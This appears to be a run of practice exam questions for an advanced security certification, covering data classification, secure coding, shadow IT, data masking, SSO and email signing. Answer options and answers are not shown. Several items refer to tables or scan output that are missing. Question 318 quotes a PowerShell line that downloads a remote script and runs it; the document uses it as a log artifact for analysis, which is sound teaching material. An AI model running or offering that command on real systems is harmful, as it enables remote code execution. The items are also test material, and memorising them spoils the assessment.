Question317: An engineer is evaluating the control profile to assign to a system containing PII, financial, and proprietary data.

Based on the data classification table above, which of the following BEST describes the overall classification?

Question318: A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell "IEX(New-Object Net.WebClient).DownloadString
('https://content.comptia.org/casp/whois.psl');whois"
Which of the following security controls would have alerted and prevented the next phase of the attack?

Question319: A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?

Question320: A Chief information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:

Which of the following MOST appropriate corrective action to document for this finding?

Question321: During a software assurance assessment, an engineer notices the source code contains multiple instances of strcpy, which does not verify the buffer length. Which of the following solutions should be integrated into the SDLC process to reduce future risks?

Question322: A security analyst is assessing a new application written in Java. The security analyst must determine which vulnerabilities exist during runtime. Which of the following would provide the most exhaustive list of vulnerabilities while meeting the objective?

Question323: A company wants to improve the security of its web applications that are running on in-house servers. A risk assessment has been performed, and the following capabilities are desired:
- Terminate SSL connections at a central location
- Manage both authentication and authorization for incoming and
outgoing web service calls
- Advertise the web service API
- Implement DLP and anti-malware features
Which of the following technologies will be the BEST option?

Question324: A security analyst is investigating unapproved cloud services that are being used in the organization. Which of the following would best allow for discovery of shadow IT?

Question325: A large telecommunications equipment manufacturer needs to evaluate the strengths of security controls in a new telephone network supporting first responders. Which of the following techniques would the company use to evaluate data confidentiality controls?

Question326: A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:
Be efficient at protecting the production environment

Not require any change to the application

Act at the presentation layer

Which of the following techniques should be used?

Question327: A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.
When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the OT network?

Question328: A security analyst is investigating a possible buffer overflow attack. The following output was found on a user's workstation:
graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments?

Question329: Based on PCI DSS v3.4, One Particular database field can store data, but the data must be unreadable. Which of the following data objects meets this requirement?

Question330: A company has a BYOD policy and has configured remote-wiping capabilities to support security requirements. An executive has raised concerns about personal contacts and photos being deleted from personal devices when an employee is terminated. Which of the following is the best way to address these concerns?

Question331: A company is moving all of its web applications to an SSO configuration using SAML. Some employees report that when signing in to an application, they get an error message on the login screen after entering their username and password, and are denied access. When they access another system that has been converted to the new SSO authentication model, they are able to authenticate successfully without being prompted for login.
Which of the following is MOST likely the issue?

Question332: A security administrator wants to allow external organizations to cryptographically validate the company's domain name in email messages sent by employees. Which of the following should the security administrator implement?